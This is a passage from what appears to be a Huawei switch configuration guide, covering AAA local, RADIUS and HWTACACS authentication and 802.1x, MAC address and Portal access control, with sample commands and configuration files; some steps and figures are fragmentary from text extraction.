Figure 10-18 Creating an Identity rule
f. Configure the rule, as shown in Figure 10-19.

Figure 10-19 Configuring the Identity rule
Click OK, and then click Save Changes.

g. Select the created access service and click Authorization. Configure the
authentication rule for the administrator according to Figure 10-20 or for the 802.1
user according to Figure 10-21.

Figure 10-20 Configuring authentication rule for administrator

Figure 10-21 Configuring authentication rule for 802.1x user
h. Click OK, and then click Save Changes.

6. Complete the configuration.
Step 3 Checking the Configuration

l An administrator logs in to the switch through Telnet.
# Choose Start > Run on your PC and enter cmd to open the Windows command line
interface. Run telnet, and enter the user name admin1 and password Huawei@1234 to
Telnet to the switch.
Username:admin1
Password:**********
<Switch> //You can log in successfully.
# Run the display access-user username admin1 command to view the granted right.
l An 802.1x user logs in to the switch.
# Run the test-aaa command on the switch to test whether the user can pass RADIUS
authentication.
[Switch] test-aaa user1@huawei.com Huawei@1234 radius-template 1

# The 802.1x user starts the 802.1x client on the PC, and enters the user name
user1@huawei.com and password Huawei@1234. If the user name and password are
correct, the client displays a successful authentication message. The user can access the
network.
# After the 802.1x user goes online, run the display access-user access-type dot1x
command on the switch to view the user information. The Dynamic VLAN and
Dynamic ACL number(Effective) fields indicate the VLAN and ACL delivered by the
RADIUS server.
----End
Configuration Files
Switch configuration file
#
sysname Switch
#
vlan batch 10 20 30 100
#
#
acl number 3000
#
radius-server shared-key cipher %^%#9nP3;sDW-AN0f@H@S*l&\f{V=V_auKe|^YXy7}bU%^%#
#
aaa
domain default_admin
radius-server 1
domain huawei.com
radius-server 1
#
interface Vlanif10
ip address 10.1.6.10 255.255.255.0
#
interface Vlanif20
ip address 10.1.2.10 255.255.255.0
#
interface Vlanif30
ip address 10.1.3.10 255.255.255.0
#
#
#
authentication dot1x
dot1x authentication-method eap
#

#
return

Users (HWTACACS and Local Authentication)
HWTACACS and Local Authentication Overview

When an HWTACACS authentication server is deployed on a network, users can be
authenticated through HWTACACS. User information is created and maintained by the
HWTACACS authentication server. A user can successfully log in to the device only when
the entered user name and password are the same as those configured on the HWTACACS
server. Compared with RADIUS, HWTACACS is more reliable in transmission and
encryption, and is more suitable for security control. Generally, HWTACACS authentication
is configured on the network requiring high security, for example, financial, government, and
telecommunication carrier networks.
Both HWTACACS authentication and local authentication are configured on a device, when
the HWTACACS server does not respond, the device performs local authentication. If only
HWTACACS authentication is configured, users fail the authentication when the device
cannot connect to the HWTACACS server.
Configuration Notes
l NOTE
As shown in Figure 10-22, an HWTACACS server is deployed on a network, and the
administrator Telnets to the device to remotely manage it. The specific requirements are as
follows:
through Telnet.
2. The device performs HWTACACS authentication for the administrator first. If the
HWTACACS server does not respond, the device performs local authentication.
levels 0-15.
Figure 10-22 Configuring authentication for Telnet login users (HWTACACS and local
authentication)
GE1/0/2
VLANIF20
10.1.6.10/24
Management
NetworkGE1/0/1
Admin VLANIF10 Switch HWTACACS Server
10.1.2.10/24 10.1.6.6/24
Username: user1@huawei.com

3. Configure AAA local authentication, including creating a local user, setting the user
4. Configure HWTACACS authentication, including creating an HWTACACS server
template, an AAA authentication scheme, and a service scheme, and applying the
schemes to a domain.
NOTE
set on the HWTACACS server, for example, device's IP address, shared key, and user information.
Procedure

Step 4 Configure AAA local authentication.

[Switch] aaa
[Switch-aaa] local-user user1@huawei.com password irreversible-cipher
Huawei@1234 //Create the local user user1@huawei.com and set password. The
password is displayed in cipher text in the configuration file, so remmember the
password. If you forget the password, run this command again to reconfigure the
password.
[Switch-aaa] local-user user1@huawei.com service-type telnet //Set the access
type of user1@huawei.com to Telnet. The user can log in through only Telnet (By

default, users can log in through any method in versions earlier than V200R007
and cannot log in through any method in V200R007 and later versions).
[Switch-aaa] local-user user1@huawei.com privilege level 15 //Set the user level
of user1@huawei.com to 15. The user can use the commands of level 15 and lower
levels.
[Switch-aaa] quit
Step 5 Configure HWTACACS authentication.
# Configure an HWTACACS server template to implement communication between the

device and the HWTACACS server.
[Switch] hwtacacs-server template 1
[Switch-hwtacacs-1] hwtacacs-server authentication 10.1.6.6 49 //Specify the IP
address and port number of the HWTACACS authentication server.
[Switch-hwtacacs-1] hwtacacs-server shared-key cipher Hello@1234 //Specify the
shared key of the HWTACACS authentication server, which must be the same as that
configured on the HWTACACS server.
[Switch-hwtacacs-1] quit
# Configure an AAA authentication scheme, set the authentication methods to HWTACACS

and local authentication.
[Switch] aaa
[Switch-aaa-authen-sch1] authentication-mode hwtacacs local

# Apply the AAA authentication scheme, HWTACACS server template, and service scheme
to the domain.
[Switch-aaa-domain-huawei.com] hwtacacs-server 1
[Switch-aaa-domain-huawei.com] service-scheme sch1
[Switch-aaa] quit
to open the cmd window. Run the telnet command and enter the user name
user1@huawei.com and password Huawei@1234 to log in to the device through Telnet.
Username:user1@huawei.com
# Shut down the interface connected to the HWTACACS authentication server, to disconnect
the device from the HWTACACS server. Choose Start > Run on your computer and enter
cmd to open the cmd window. Run the telnet command and enter the user name
user1@huawei.com and password Huawei@1234 to log in to the device through Telnet. You
can successfully log in to the device, indicating that the device performs local authentication
when the HWTACACS server does not respond.
----End

Configuration Files
#
sysname Switch
#
vlan batch 10 20
#
#
hwtacacs-server template 1
hwtacacs-server authentication 10.1.6.6
hwtacacs-server shared-key cipher %^%#q(P3<qAXm=Pq).G8bgq@"sbFOf%0k%umgQJ3#MF3%^
%#
#
aaa
authentication-mode hwtacacs local
service-scheme sch1
domain huawei.com
service-scheme sch1
hwtacacs-server 1
local-user user1@huawei.com password irreversible-cipher %^%#+bxGT|w}~J-
FHdDG"R8"($BX%XF/R1uba0UwL0).&r"Z#zbz*2G1$%6)Rd/V%^%#
local-user user1@huawei.com privilege level 15
local-user user1@huawei.com service-type telnet
#
interface Vlanif10
ip address 10.1.2.10 255.255.255.0
#
interface Vlanif20
ip address 10.1.6.10 255.255.255.0
#
#
#
#
return
10.1.6 Example for Configuring Default Domain-based User

Management
Domain and Default Domain Overview

The device manages access users based on domains. Each access user belongs to a domain.
The authentication, authorization, and accounting schemes can be bound to domain views.
The device manages the access users in the same domain in the same manner, for example,
using the same authentication, authorization, and accounting scheme.
As shown in Figure 10-23, the users are authenticated in the specified domain when entered
user names contain domain names or in the default domain when entered user names do not

contain domain names. If a user name contains a domain name, the user belongs to this
domain; otherwise, the user belongs to the default domain. If most users on a network belong
to the same domain, you can configure this domain as the default domain so that these users
do not need to enter the domain name when logging in to the device.
Default domains fall into default administrative domain and default common domain.
l The administrator (logging in through Telnet, SSH, FTP, HTTP, or Terminal) is

authenticated in the default administrative domain.
By default, the default administrative domain is default_admin.
l The common users (logging in through MAC, Portal, PPP, or 802.1x authentication) are
authenticated in the default common domain.
By default, the default common domain is default.
Figure 10-23 User domains
The user enters the The user is

user name user- The user name
Yes authenticated in
name@domain- contains a domain name
the domain-
name or user-name. domain-name?
name domain.
No
The administrator is authenticated in the

global default administrative domain.
The common user is authenticated in the
global default common domain.
NOTE
You can modify the configuration of the default domains by default, but cannot delete the default domains by
default.
Configuration Notes
l NOTE
As shown in Figure 10-24, the administrator Telnets to the device and remotely manages the
device after passing AAA local authentication, and 802.1x users log in to the device through
802.1x clients after passing RADIUS authentication. Therefore, both AAA local
authentication and RADIUS authentication need to be configured on the device.
1. The administrator must enter correct user name and password to Telnet to the device.
After logging in to the device, the administrator can run all the commands at levels 0-15.
2. 802.1x users must enter correct user names and passwords to log in to the device.
3. The administrator and 802.1x users do not need to enter domain names when logging in.

Figure 10-24 Configuring default domain-based user management
M anagem ent G E 1 /0 /1
1 0 .1 .2 .1 0 /2 4 G E 1 /0 /2
A d m in
V L A N IF 3 0
U se rn a m e : u se r1 1 0 .1 .6 .1 0 /2 4
P a ssw o rd : H u a w e i@ 1 2 3 4
S w itch R A D IU S S e rve r
1 0 .1 .6 .6 /2 4
G E 1 /0 /3
A cc e ss
V L A N IF 1 0
N e tw o rk
1 0 .1 .3 .1 0 /2 4
8 0 2 .1 x u s e r
U se rn a m e : Jo h n
P a ss w o rd : H e llo @ 5 6 7 8
1. Allow the administrator to Telnet to the device.
a. Enable the Telnet service.
b. Set the authentication method for Telnet login users to AAA.
c. Configure AAA local authentication, including creating a local user, setting the user
2. Allow 802.1x users to log in to the device through RADIUS authentication.
a. Enable 802.1x authentication on the interface.
b. Configure RADIUS authentication, including creating a RADIUS server template,
an AAA authentication scheme, and a service scheme, and applying the schemes to
the default common domain.
NOTE
set on the RADIUS server, for example, device's IP address, shared key, and the creating user.
Procedure


Step 2 Configure AAA local authentication for the administrator to Telnet to the device.
# Enable the Telnet server.

# Set the authentication method for the VTY user interface to AAA.
# Configure AAA local authentication.

[Switch] aaa
[Switch-aaa] local-user user1 password irreversible-cipher Huawei@1234 //Create
local user user1 and set the password. The password is displayed in cipher text
in the configuration file, so remmember the password. If you forget the password,
run this command again to reconfigure the password .
[Switch-aaa] local-user user1 service-type telnet //Set the access type of user1
to Telnet. The user can log in through only Telnet (by default, users can log in
through any method in versions earlier than V200R007 and cannot log in through
any method in V200R007 and later versions).
[Switch-aaa] local-user user1 privilege level 15 //Set the user level of user1
to 15. The user can use the commands of level 15 and lower levels.
[Switch-aaa] quit
NOTE
When the entered user name does not contain a domain name, the device authenticates the user using the
default administrative domain default_admin. By default, the default administrative domain uses the
authentication scheme default and accounting scheme default.
l Authentication scheme default: local authentication
l Accounting scheme default: non-accounting
Step 3 Configure RADIUS authentication for 802.1x users to log in to the device.
# Configure the RADIUS server template to implement communication between the device
and the RADIUS server.
[Switch-radius-1] radius-server authentication 10.1.6.6 1812 //Specify the IP
address and port number of the RADIUS authentication server.
[Switch-radius-1] radius-server shared-key cipher Hello@1234 //Specify the
shared key of the RADIUS server, which must be the same as that configured on the
RADIUS server.
NOTE
If the RADIUS server does not accept the user names containing domain names, run the undo radius-server
user-name domain-included command on the device so that the packets sent from the device to the
RADIUS server do not contain domain names.

# Configure an AAA authentication scheme and set the authentication mode to RADIUS.
[Switch] aaa

# Apply the AAA authentication scheme, RADIUS server template, and service scheme to the
default common domain.
[Switch-aaa] domain default
[Switch-aaa-domain-default] authentication-scheme sch1
[Switch-aaa-domain-default] service-scheme sch1
[Switch-aaa-domain-default] radius-server 1
[Switch-aaa-domain-default] quit
[Switch-aaa] quit
# Set the NAC mode to unified.

NOTE
After the common mode is changed to unified mode, restart the device to make the configuration take effect.
By default, the unified mode is used.
# Enable 802.1x authentication on the interface.
l In the versions earlier than V200R009:

l In V200R009 and later versions:

[Switch] dot1x-access-profile name d1
[Switch-dot1x-access-profile-d1] quit
[Switch] authentication-profile name p1
[Switch-authen-profile-p1] dot1x-access-profile d1
[Switch-authen-profile-p1] authentication mode multi-authen max-user 100
[Switch-authen-profile-p1] quit
[Switch-GigabitEthernet1/0/3] authentication-profile p1
to open the cmd window. Run the telnet command and enter the user name user1 and
password Huawei@1234 to log in to the device through Telnet.
Username:user1
# Run the test-aaa command to test whether an 802.1x user can pass the authentication.
[Switch] test-aaa liming Hello@5678 radius-template 1

# A user starts the 802.1x client on a terminal, and enters the user name liming and password
Hello@5678 for authentication. If the user name and password are correct, an authentication
success message is displayed on the client page. The user can access the network.
# After the user goes online, you can run the display access-user access-type dot1x
command to check online 802.1x user information.
----End
Configuration Files
#
sysname Switch
#
vlan batch 10 20 30
#
#
authentication-profile name p1 //Available only in V200R009 and later versions
dot1x-access-profile d1
authentication mode multi-authen max-user 100
#
radius-server shared-key cipher %^%#9nP3;sDW-AN0f@H@S*l&\f{V=V_auKe|^YXy7}bU%^%#
#
aaa
service-scheme sch1
domain default
service-scheme sch1
radius-server 1
local-user user1 password irreversible-cipher %^%#,G8c3$Xso~0qP~%Bz/hY5~IR)oN~
$8}UEJ59Ho{C\U</DW6:w,q{4Q!r}!:H%^%#
local-user user1 privilege level 15
local-user user1 service-type telnet
#
interface Vlanif10
ip address 10.1.3.10 255.255.255.0
#
interface Vlanif20
ip address 10.1.2.10 255.255.255.0
#
interface Vlanif30
ip address 10.1.6.10 255.255.255.0
#
#
#
authentication dot1x //Available only in the versions earlier than V200R009
authentication-profile p1 //Available only in V200R009 and later versions
#

#
dot1x-access-profile name d1 //Available only in V200R009 and later versions
#
return
10.2 Typical NAC Configuration (Common Mode)
10.2.1 Example for Configuring 802.1x Authentication to Control

Internal User Access
802.1x Authentication Overview

802.1x is a port-based network access control protocol and 802.1x authentication is one of
NAC authentication modes. 802.1x authentication ensures security of enterprise intranets.
802.1x authentication ensures high security; however, it requires that 802.1x client software
be installed on user terminals, resulting in inflexible network deployment. Another two NAC
authentication methods have their advantages and disadvantages: MAC address authentication
does not require client software installation, but MAC addresses must be registered on an
authentication server. Portal authentication also does not require client software installation
and provides flexible deployment, but it has low security.
As a result, 802.1x authentication is applied to scenarios with new networks, centralized user
distribution, and strict information security requirements. In addition, 802.1x authentication
supports MAC address bypass authentication so that the dumb terminals on 802.1x
authentication networks can be connected after passing authentication.
Configuration Notes
l NOTE
l If 802.1x authentication is enabled on an interface, the following commands cannot be
used on the same interface.
Command Function
mac-limit Sets the maximum number of MAC

addresses that can be learned by an
interface.
mac-address learning disable Disables MAC address learning on an

interface.
port link-type dot1q-tunnel Sets the link type of an interface to QinQ.
port vlan-mapping vlan map-vlan Configures VLAN mapping on an

port vlan-mapping vlan inner-vlan interface.
port vlan-stacking Configures selective QinQ.

Command Function
port-security enable Enables interface security.
mac-vlan enable Enables MAC address-based VLAN

assignment on an interface.
ip-subnet-vlan enable Enables IP subnet-based VLAN

As shown in Figure 10-25, the terminals in an office are connected to the company's internal
network through the Switch. Unauthorized access to the internal network can damage the
company's service system and cause leakage of key information assets. Therefore, the
administrator requires that the Switch should control the users' network access rights to ensure
internal network security.
Figure 10-25 Networking diagram for configuring 802.1x authentication
U ser R A D IU S S e rve r
1 9 2 .1 6 8 .2 .3 0
……
G E 1 /0 /1 G E 1 /0 /2
In tra n e t
VLAN 10 VLAN 20
U se r L A N S w itch S w itch
P rin te r
1. Create and configure a RADIUS server template, an AAA scheme, and an authentication
domain. Bind the RADIUS server template and AAA scheme to the authentication
domain so that the Switch can authenticate access users through the RADIUS server.
2. Configure 802.1x authentication on the Switch.
a. Enable 802.1x authentication to control network access rights of the employees in
the office.
b. Enable MAC address bypass authentication to authenticate terminals (such as
printers) that cannot install 802.1x authentication client software.

NOTE
Before configuring this example, ensure that devices can communicate with each other in the network.
In this example, the LAN switch exists between the access switch Switch and users. To ensure that
users can pass 802.1x authentication, you must configure the EAP packet transparent transmission
function on the LAN switch.
l Method 1: The S5700 is used as an example of the LAN switch. Perform the following
operations:
1. Run the l2protocol-tunnel user-defined-protocol 802.1x protocol-mac 0180-c200-0003
group-mac 0100-0000-0002 command in the system view of the LAN switch to configure the
LAN switch to transparently transmit EAP packets.
2. Run the l2protocol-tunnel user-defined-protocol 802.1x enable command on the interface
connecting to users and the interface connecting to the access switch to enable the Layer 2
protocol transparent transmission function.
l Method 2: This method is recommended when a large number of users exist or high network
performance is required.
1. Run the following commands in the system view:
l undo bpdu mac-address 0180-c200-0000 ffff-ffff-fff0
l bpdu mac-address 0180-c200-0000 FFFF-FFFF-FFFE
l bpdu mac-address 0180-c200-0002 FFFF-FFFF-FFFF
l bpdu mac-address 0180-c200-0004 FFFF-FFFF-FFFC
l bpdu mac-address 0180-c200-0008 FFFF-FFFF-FFF8
2. (This step is mandatory when you switch from method 1 to method 2.) Run the undo
l2protocol-tunnel user-defined-protocol 802.1x enable command in the interface view to
delete the configuration of transparent transmission of 802.1x protocol packets.
Procedure
Step 1 Create VLANs and configure the VLAN allowed by the interface to ensure network
communication.
# Create VLAN 10 and VLAN 20.
# On the Switch, set GE1/0/1 connecting to users as an access interface, and add GE1/0/1 to
VLAN 10.
NOTE
Configure the interface type and VLANs according to the actual situation. In this example, users are
added to VLAN 10.
# On the Switch, set GE1/0/2 connecting to the RADIUS server as an access interface, and
add GE1/0/2 to VLAN 20.
Step 2 Create and configure a RADIUS server template, an AAA scheme, and an authentication
domain.

# Create and configure the RADIUS server template rd1.

[Switch] radius-server template rd1
[Switch-radius-rd1] radius-server authentication 192.168.2.30 1812
[Switch-radius-rd1] radius-server shared-key cipher Huawei@2012
[Switch-radius-rd1] quit
# Create AAA scheme abc and set the authentication mode to RADIUS.
[Switch] aaa
[Switch-aaa] authentication-scheme abc
[Switch-aaa-authen-abc] authentication-mode radius
[Switch-aaa-authen-abc] quit
# Create authentication domain isp1, and bind AAA scheme abc and RADIUS server
template rd1 to authentication domain isp1.
[Switch-aaa] domain isp1
[Switch-aaa-domain-isp1] authentication-scheme abc
[Switch-aaa-domain-isp1] radius-server rd1
[Switch-aaa-domain-isp1] quit
[Switch-aaa] quit
# Configure the default domain isp1 in the system view. When a user enters the user name in
the format of user@isp1, the user is authenticated in the authentication domain isp1. If the
user name does not carry the domain name or carries a nonexistent domain name, the user is
authenticated in the default domain.
[Switch] domain isp1
Step 3 Configure 802.1x authentication.

# Switch the NAC mode to common mode.
[Switch] undo authentication unified-mode
Warning: Switching the authentication mode will take effect after system restart
. Some configurations are invalid after the mode is switched. For the invalid co
mmands, see the user manual. Save the configuration file and reboot now? [Y/N] y
NOTE
l By default, the NAC unified mode is used.

l After the unified mode is switched to common mode, you must save the configuration and restart the
device to make each function in the new configuration mode take effect. In versions earlier than
V200R007C00, you need to manually run the commands for saving the configuration and restarting the
device.
# Enable 802.1x authentication globally and on an interface.

<Switch> system-view
[Switch] dot1x enable
[Switch-GigabitEthernet1/0/1] dot1x enable
[Switch-GigabitEthernet1/0/1] dot1x authentication-method eap
# Configure MAC address bypass authentication.

[Switch-GigabitEthernet1/0/1] dot1x mac-bypass

1. Run the display dot1x command to check the 802.1x authentication configuration. The
command output (802.1x protocol is Enabled) shows that the 802.1x authentication has
been enabled on the interface GE1/0/1.
2. The user starts the 802.1x client on the terminal, and enters the user name and password
for authentication.

3. If the user name and password are correct, an authentication success message is
displayed on the client page. The user can access the network.
4. After the user goes online, you can run the display access-user command on the device
to check the online 802.1x user information.
----End
Configuration Files
#
sysname Switch
#
vlan batch 10 20
#
undo authentication unified-mode
#
domain isp1
#
dot1x enable
#
radius-server template rd1
radius-server shared-key cipher %^%#Q75cNQ6IF(e#L4WMxP~%^7'u17,]D87GO{"[o]`D%^%#
#
aaa
authentication-scheme abc
domain isp1
radius-server rd1
#
dot1x mac-bypass
#
#
return
Related Content
Videos
Configure 802.1x Authentication
10.2.2 Example for Configuring MAC Address Authentication to

Control Internal User Access
MAC Address Authentication Overview
As one of NAC authentication modes, MAC address authentication controls a user's network
access rights based on the user's interface and MAC address. The user does not need to install
any client software. MAC address authentication ensures security of enterprise intranets.
In MAC address authentication, client software does not need to be installed on user
terminals, but MAC addresses must be registered on servers, resulting in complex

management. Another two NAC authentication methods have their advantages and
disadvantages: 802.1x authentication ensures high security, but it requires that 802.1x client
software be installed on user terminals, causing inflexible network deployment. Portal
authentication also does not require client software installation and provides flexible
deployment, but it has low security.
MAC address authentication is applied to access authentication scenarios of dumb terminals
such as printers and fax machines.
Configuration Notes
l NOTE
l The mac-authen command cannot be used together with the following commands on the
same interface.
Command Function

interface.

interface.



As shown in Figure 10-26, the terminals in the physical access control department are
connected to the company's internal network through the Switch. Unauthorized access to the
internal network can damage the company's service system and cause leakage of key
information assets. Therefore, the administrator requires that the Switch should control the
users' network access rights to ensure internal network security.

Figure 10-26 Configuring MAC address authentication to control internal user access
Printer
RADIUS Server
192.168.2.30
Physical access
control
department
GE1/0/1 GE1/0/2
Network
……
VLAN 10 VLAN 20
LAN Switch Switch
Printer
2. Enable MAC address authentication so that the Switch can control network access rights
of the dumb terminals in the physical access control department.
NOTE
Procedure
communication.
VLAN 10.
NOTE
added to VLAN 10.


domain.
[Switch] aaa
[Switch-aaa] quit
Step 3 Configure MAC address authentication.

NOTE

device.
# Enable MAC address authentication globally and on the interface.

[Switch] mac-authen
[Switch-GigabitEthernet1/0/1] mac-authen

1. Run the display mac-authen command to check the MAC address authentication
configuration. The command output (MAC address authentication is enabled) shows
that MAC address authentication has been enabled on the interface GE1/0/1.

2. After the user starts the terminal, the device automatically obtains the terminal MAC
address and uses it as the user name and password for authentication.
3. The user can access the network after the authentication succeeds.
to check the online MAC address authentication user information.
----End
Configuration Files
#
sysname Switch
#
vlan batch 10 20
#
#
domain isp1
#
mac-authen
#
#
aaa
domain isp1
radius-server rd1
#
mac-authen
#
#
return
10.2.3 Example for Configuring Portal Authentication to Control

Portal Authentication Overview

As one of NAC authentication modes, Portal authentication is also called web authentication.
Generally, Portal authentication websites are also called Portal websites. When users go
online, they must be authenticated on Portal websites. The users can use network resources
only after they pass the authentication.
Portal authentication cannot ensure high security, but it does not require client software
installation and provides flexible deployment. Another two NAC authentication methods have
their advantages and disadvantages: 802.1x authentication ensures high security, but it
requires that 802.1x client software be installed on user terminals, causing inflexible network
deployment. MAC address authentication does not require client software installation, but

MAC addresses must be registered on an authentication server, resulting in complex

management.
Portal authentication is applied to scenarios where a large number of scattered users such as
company visitors move frequently.
Configuration Notes
This example applies to all S12700 versions.
NOTE
As shown in Figure 10-27, the terminals in the visitor area are connected to the company's
internal network through the Switch. Unauthorized access to the internal network can damage
the company's service system and cause leakage of key information assets. Therefore, the
Figure 10-27 Configuring Portal authentication to control internal user access
Visitor
RADIUS Server
192.168.2.30
Visitor area
GE1/0/1 GE1/0/2
Network
……
VLAN 10 VLAN 20
LAN Switch Switch
Portal Server
192.168.2.20
Visitor
2. Configure Portal authentication so that the device can control network access rights of
the visitors in the visitor areas.
a. Create and configure a Portal server template to ensure normal information
exchange between the device and the Portal server.
b. Enable Portal authentication to authenticate access users.

c. Configure a shared key that the device uses to exchange information with the Portal
server to improve communication security.
NOTE
Procedure
communication.
VLAN 10.
NOTE
added to VLAN 10.
domain.
[Switch] aaa
[Switch-aaa] quit

Step 3 Configure Portal authentication.

NOTE

device.

[Switch] web-auth-server abc
[Switch-web-auth-server-abc] server-ip 192.168.2.20
[Switch-web-auth-server-abc] port 50200
[Switch-web-auth-server-abc] url http://192.168.2.20:8080/webagent
[Switch-web-auth-server-abc] quit
NOTE
Ensure that the port number configured on the device is the same as that used by the Portal server.
# Enable Portal authentication.

[Switch-Vlanif10] web-auth-server abc direct
# Set the shared key in cipher text to Huawei@123.

[Switch-web-auth-server-abc] shared-key cipher Huawei@123
NOTE
In this example, users are allocated static IP addresses. If the users obtain IP addresses through DHCP and the
DHCP server is upstream connected to Switch, use the portal free-rule command to create authentication-
free rules and ensure that the DHCP server is included in the authentication-free rules.
In addition, if the URL of Portal server needs to be analyzed by DNS and the DNS server is upstream
connected to Switch, you also need to create authentication-free rules and ensure that the DNS server is
included in the authentication-free rules.

1. Run the display portal and display web-auth-server configuration commands to
check the Portal authentication configuration. The command output (web-auth-server
layer2(direct)) shows that the Portal server template has been bound to the interface
vlanif10.
2. After starting the browser and entering any network address, the user is redirected to the
Portal authentication page. The user then enters the user name and password for
authentication.

displayed on the Portal authentication page. The user can access the network.
to check the online Portal authentication user information.
----End
Configuration Files
#
sysname Switch
#
vlan batch 10 20
#
#
domain isp1
#
#
web-auth-server abc
server-ip 192.168.2.20
port 50200
shared-key cipher %^%#t:hJ@gD7<+G&,"Y}Y[VP4\foQ&og/Gg(,J4#\!gD%^
%#
url http://192.168.2.20:8080/webagent
#
aaa
domain isp1
radius-server rd1
#
interface Vlanif10
web-auth-server abc direct
#
#
#
return
10.3 Typical NAC Configuration (Unified Mode)

(V200R007C00 and Earlier Versions, V200R008C00)


distribution, and strict information security requirements.
Configuration Notes
l NOTE
l If 802.1x authentication is enabled on an interface, the following commands cannot be
Command Function

interface.

interface.



As shown in Figure 10-28, the terminals in an office are connected to the company's internal
network through the Switch. Unauthorized access to the internal network can damage the

company's service system and cause leakage of key information assets. Therefore, the
Figure 10-28 Configuring 802.1x authentication to control internal user access
Employee
RADIUS Server
192.168.2.30
Office area GE1/0/1 GE1/0/2

Network
VLAN 10 VLAN 20
……
LAN Switch Switch
Employee
2. Enable 802.1x authentication to control network access rights of the employees in the
office.
3. Configure the user access mode to multi-authen and set the maximum number of access
users to 100, so the device can control the network access rights of each user
independently.

NOTE
In this example, the LAN switch exists between the access switch Switch and users. To ensure that users
can pass 802.1x authentication, you must configure the EAP packet transparent transmission function on
the LAN switch.
l Method 1: The S5700 is used as an example of the LAN switch. Perform the following operations:
group-mac 0100-0000-0002 command in the system view of the LAN switch to configure the
LAN switch to transparently transmit EAP packets.
2. Run the l2protocol-tunnel user-defined-protocol 802.1x enable command on the interface
connecting to users and the interface connecting to the access switch to enable the Layer 2
protocol transparent transmission function.
Procedure
Step 1 Create VLANs and configure the VLANs allowed by the interface to ensure network
communication.
# On the Switch, configure the interface GE1/0/1 connected to users as an access interface
and add the interface to VLAN 10.
NOTE
Configure the interface type and VLANs based on the site requirements. In this example, users are
added to VLAN 10.
# On the Switch, configure the interface GE1/0/2 connected to the RADIUS server as an
access interface and add the interface to VLAN 20.
domain.


# Create an AAA authentication scheme abc and configure the authentication mode to
RADIUS.
[Switch] aaa
# Create an authentication domain isp1, and bind the AAA scheme abc and RADIUS server
template rd1 to the domain isp1.
[Switch-aaa] quit
# Configure isp1 as the global default domain. During access authentication, enter a user
name in the format user@isp1 to perform AAA authentication in the domain isp1. If the user
name does not contain the domain name or contains an invalid domain name, the user is
Step 3 Configure 802.1x authentication on the Switch.

# Switch the NAC mode to unified mode.
NOTE
After the common mode and unified mode are switched, you must save the configuration and restart the
device to make each function in the new configuration mode take effect.
# Enable 802.1x authentication on the interface GE1/0/1.

[Switch-GigabitEthernet1/0/1] authentication mode multi-authen max-user 100

1. Run the display dot1x command to check the 802.1x authentication configuration. The
command output (802.1x protocol is Enabled) shows that the 802.1x authentication has
been enabled on the interface GE1/0/1.
2. The user starts the 802.1x client on the terminal, and enters the user name and password
for authentication.
4. After the user goes online, you can run the display access-user access-type dot1x
command on the device to check the online 802.1x user information.
----End
Configuration Files

#
sysname Switch
#
vlan batch 10 20
#
domain isp1
#
radius-server shared-key cipher %^%#Q75cNQ6IF(e#L4WMxP~%^7'u17,]D87GO{"[o]`D%^
%#
#
aaa
domain isp1
radius-server rd1
#
#
#
return
Related Content
Videos



Configuration Notes

l NOTE
l The mac-authen command cannot be used together with the following commands on the
same interface.
Command Function

interface.

interface.



As shown in Figure 10-29, the terminals in the physical access control department are
information assets. Therefore, the administrator requires that the Switch should control the
users' network access rights to ensure internal network security.

Figure 10-29 Configuring MAC address authentication to control internal user access
Printer
RADIUS Server
192.168.2.30
Physical access
control
department GE1/0/1 GE1/0/2 Network
VLAN 10 VLAN 20
……
LAN Switch Switch
Printer
2. Enable MAC address authentication so that the Switch can control network access rights
of the dumb terminals in the physical access control department.
independently.
NOTE
Procedure
communication.
NOTE
added to VLAN 10.

domain.
RADIUS.
[Switch] aaa
[Switch-aaa] quit
Step 3 Configure MAC address authentication on the Switch.

NOTE
# Enable MAC address authentication on the interface GE1/0/1.

[Switch-GigabitEthernet1/0/1] authentication mac-authen

1. Run the display mac-authen command to check the MAC address authentication
configuration. The command output (MAC address authentication is enabled) shows
that MAC address authentication has been enabled on the interface GE1/0/1.
2. After the user starts the terminal, the device automatically obtains the terminal MAC
address and uses it as the user name and password for authentication.

3. The user can access the network after the authentication succeeds.
4. After the user goes online, you can run the display access-user access-type mac-authen
command on the device to check the online MAC address authentication user
information.
----End
Configuration Files
#
sysname Switch
#
vlan batch 10 20
#
domain isp1
#
%#
#
aaa
domain isp1
radius-server rd1
#
authentication mac-authen
#
#
return


management.

Configuration Notes
l NOTE
As shown in Figure 10-30, the terminals in the visitor area are connected to the company's
Figure 10-30 Configuring Portal authentication to control internal user access
V isito r
R A D IU S S e rve r
1 9 2 .1 6 8 .2 .3 0
V isito r a re a
G E 1 /0 /1 G E 1 /0 /2 N e tw o rk
VLAN 10 VLAN 20
……
L A N S w itch S w itc h
P o rta l S e rve r
V isito r 1 9 2 .1 6 8 .2 .2 0
2. Enable Portal authentication so that the Switch can control network access rights of the
visitors in the visitor areas.
3. Configure a Portal server template so that the device can communicate with the Portal
server.
NOTE
Procedure
communication.


NOTE
added to VLAN 10.
domain.

RADIUS.
[Switch] aaa
[Switch-aaa] quit
Step 3 Configure Portal authentication on the Switch.


NOTE
# Enable Portal authentication on the interface GE1/0/1.

[Switch-GigabitEthernet1/0/1] authentication portal

NOTE
# Bind the Portal server template abc to the interface GE1/0/1.

[Switch-GigabitEthernet1/0/1] web-auth-server abc direct
NOTE
In this example, users are allocated static IP addresses. If the users obtain IP addresses through DHCP and the
DHCP server is upstream connected to Switch, use the authentication free-rule command to create
authentication-free rules and ensure that the DHCP server is included in the authentication-free rules.
In addition, if the URL of Portal server needs to be analyzed by DNS and the DNS server is upstream
connected to Switch, you also need to create authentication-free rules and ensure that the DNS server is
included in the authentication-free rules.

1. Run the display portal and display web-auth-server configuration commands to
check the Portal authentication configuration. The command output (web-auth-server
layer2(direct)) shows that the Portal server template has been bound to the interface
GE1/0/1.
2. After starting the browser and entering any network address, the user is redirected to the
Portal authentication page. The user then enters the user name and password for
authentication.
4. After the user goes online, you can run the display access-user access-type portal
command on the device to check the online Portal authentication user information.
----End
Configuration Files
#
sysname Switch
#
vlan batch 10 20
#
domain isp1

#
%#
#
web-auth-server abc
server-ip 192.168.2.20
port 50200
%#
#
aaa
domain isp1
radius-server rd1
#
authentication portal
#
#
return
10.3.4 Example for Configuring Multiple Authentication Modes

to Control Internal User Access
Overview of Multiple Authentication Modes
In NAC network deployment, to provide flexible authentication, the device supports
concurrent deployment of 802.1x authentication, MAC address authentication, and Portal
authentication on the interfaces connected to users. In this case, the users can access the
network using any authentication mode.
If multiple authentication modes are enabled, the authentication modes take effect in the
sequence they are configured. In addition, after multiple authentication modes are deployed,
users can be authenticated in different modes by default and assigned different network rights
accordingly by the device.
Configuration Notes
l NOTE
As shown in Figure 10-31, the terminals in a company are connected to the company's

